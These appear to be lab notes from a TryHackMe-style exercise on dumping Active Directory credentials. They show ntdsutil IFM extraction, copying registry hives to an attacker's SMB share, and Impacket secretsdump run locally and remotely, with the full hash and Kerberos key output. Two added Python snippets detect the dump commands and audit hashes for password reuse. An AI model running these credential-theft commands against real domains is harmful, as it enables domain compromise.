tags: Estrazione_Credenziali Windows_Privilage_Escalation Domain_Controller_Privilage_Escalation


Local Dumping (No Credentials)

The following command copies all the files we need into the Temp folder:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Now we transfer all the files to the attacking machine.

We set up an SMB server on our attacking machine:

 
┌──(kali㉿kali)-[/tmp]
└─$ mkdir share 
                                                                                    
┌──(kali㉿kali)-[/tmp]
└─$ python3 /opt/impacket/examples/smbserver.py -smb2support -username panino -password panino2 public share
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
 

On the Windows machine we copy the files as follows:

 
# First we authenticate
 
net use \\192.168.165.50\public /user:panino panino2
 
The command completed successfully.
 
C:\temp\registry>copy SECURITY \\192.168.165.50\public
        1 file(s) copied.
 
C:\temp\registry>copy SYSTEM \\192.168.165.50\public
        1 file(s) copied.

Now go to the folder that contains all the files (in this case /tmp/share) and run the following command:

 
python3 /opt/impacket/examples/secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit local 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:2df7c0f9320b549f8183e2cbd6c58ea344ae88895e6666894e1cf3ba8b9ac6e960de46ce0f6c1a7321d44d2c208475703558991f7234588b5798368bdf1c0e098dc44d7636e08968a381bd1bd16497020fc6af57f9da12cdfcbd6595fe8594452b9eb751040ad8c6a6c3887e0af6995dfc91f771c68b81e3728282a428a7819a60283870bb12ba3eb2cb02ecc73cee1bf32c1e237d80d2f73d268521896c9130f6a6e6e95f1230d3d8c5481349cdd68940a8e6b428e5f3a6a3342a1a3ac900b331146ffc356aac01b8232fa01d5b7cfb852afab3911c3a227a3981133015ce632deb00f6484873df68551e7e2c0dfc1c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0e88ce11d311d3966ca2422ac2708a4d707e00be
dpapi_userkey:0x8b68be9ef724e59070e7e3559e10078e36e8ab32
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 
 ....
 ....
 ....
 

You can also use the following command to extract only the NTLM hashes:

sudo python3 /opt/impacket/examples/secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit -just-dc-ntlm local
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 55db1e9562985070bbba0ef2cc25754c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
[*] Cleaning up... 
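From the defender's side, the steps above leave clear traces in process-creation telemetry: the ntdsutil IFM invocation and the copy of the hives to a UNC share. The following Python example is added here and is not part of the original notes; it runs two detection rules over constructed command lines shaped like Windows 4688 records (hosts, users and the non-page command lines are assumptions) and shows that the abbreviated quoting used on this page still matches.

```python
import re

# Constructed sample records shaped like process-creation events (Windows 4688 style);
# hosts, users and command lines are made up for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "THM\\bk-admin",
     "cmd": "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\""},
    {"host": "DC01", "user": "THM\\svc-backup",
     "cmd": 'ntdsutil.exe "activate instance ntds" ifm "create full D:\\ifm" quit quit'},
    {"host": "DC01", "user": "THM\\bk-admin",
     "cmd": "copy SYSTEM \\\\192.168.165.50\\public"},
    {"host": "DC01", "user": "THM\\thm",
     "cmd": 'ntdsutil.exe "ac i ntds" files info q q'},
    {"host": "WS07", "user": "THM\\victim",
     "cmd": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]

# ntdsutil accepts abbreviated verbs, so match both "ac i ntds" and "activate instance ntds",
# and require the IFM "create" sub-command rather than flagging every ntdsutil run.
NTDS_INSTANCE = re.compile(r"\b(ac|activate)\s+(i|instance)\s+ntds\b", re.IGNORECASE)
IFM_CREATE = re.compile(r"\bifm\b.*\bcreate\b", re.IGNORECASE)
# Copy of a registry hive or the NTDS database to a UNC path: the exfiltration step above.
HIVE_TO_UNC = re.compile(r"\b(copy|xcopy|robocopy)\b.*\b(system|security|sam|ntds\.dit)\b.*\\\\",
                         re.IGNORECASE)


def classify(cmd):
    """Return a finding label for one command line, or None when no rule matches."""
    # Drop the quoting the ntdsutil arguments are wrapped in and collapse whitespace,
    # so the same invocation matches however it was quoted.
    flat = " ".join(cmd.replace("'", " ").replace('"', " ").split())
    if "ntdsutil" in flat.lower() and NTDS_INSTANCE.search(flat) and IFM_CREATE.search(flat):
        return "ntds_ifm_dump"
    if HIVE_TO_UNC.search(flat):
        return "hive_copy_to_unc"
    return None


def scan(events):
    """Return (host, user, label) for every event that triggers a rule, in input order."""
    hits = []
    for event in events:
        label = classify(event["cmd"])
        if label:
            hits.append((event["host"], event["user"], label))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```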
 

Remote Dumping (With Credentials)

Once we have obtained credentials for a user, we can dump the hashes of the system and of the domain controller remotely; this requires credentials, such as a password or an NTLM hash.

To do so we can use the following tool as follows:

python3 /opt/impacket/examples/secretsdump.py -just-dc THM.red/[email protected] 
 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df8e921088e82b2da0955ed41e83d4c211031b99118bf30
Administrator:aes128-cts-hmac-sha1-96:bab514a24ef3df25c182f5520bfc54a0
Administrator:des-cbc-md5:6d34e608f8574632
krbtgt:aes256-cts-hmac-sha1-96:24fad271ecff882bfce29d8464d84

In this case the user is bk-admin, and I cracked its password with hashcat from the output of the local dump without credentials.

You can also extract only the NTLM hashes with the following command:

python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/[email protected]
 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
[*] Cleaning up...
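The domain\uid:rid:lmhash:nthash lines produced by both the local and the remote dump are easy to audit, and the output above already shows why that matters: admin, thm-local and bk-admin share one NT hash, so cracking bk-admin's password opened all three. The following Python example is added here and is not part of the original notes; it parses a constructed excerpt built from the hash values shown on this page and reports shared NT hashes (password reuse), empty passwords and accounts that still store an LM hash.

```python
from collections import defaultdict

# Constructed excerpt in secretsdump's domain\uid:rid:lmhash:nthash::: format, using the
# hash values shown on this page; status lines are included to show they are skipped.
DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
thm.red\\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
[*] Cleaning up...
"""

# Well-known hashes of the empty string: LM (what is stored when LM hashing is disabled)
# and NT (an account whose password really is empty).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse(dump):
    """Return (account, rid, lmhash, nthash) tuples; lines that are not hash rows are skipped."""
    rows = []
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # banner, "[*]" status line, or empty line
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows


def audit(dump):
    """Group accounts by NT hash and report the findings a password audit would raise."""
    rows = parse(dump)
    by_nt = defaultdict(list)
    for account, _rid, _lm, nt in rows:
        by_nt[nt].append(account)
    return {
        # Same NT hash means same password: one crack (as with bk-admin above) opens all of them.
        "shared_password": {nt: accts for nt, accts in by_nt.items()
                            if len(accts) > 1 and nt != EMPTY_NT},
        "empty_password": by_nt.get(EMPTY_NT, []),
        # A non-empty LM hash means the weak LM hash is still stored for that account.
        "lm_stored": [account for account, _rid, lm, _nt in rows if lm != EMPTY_LM],
    }


if __name__ == "__main__":
    for finding, value in audit(DUMP).items():
        print(finding, value)
```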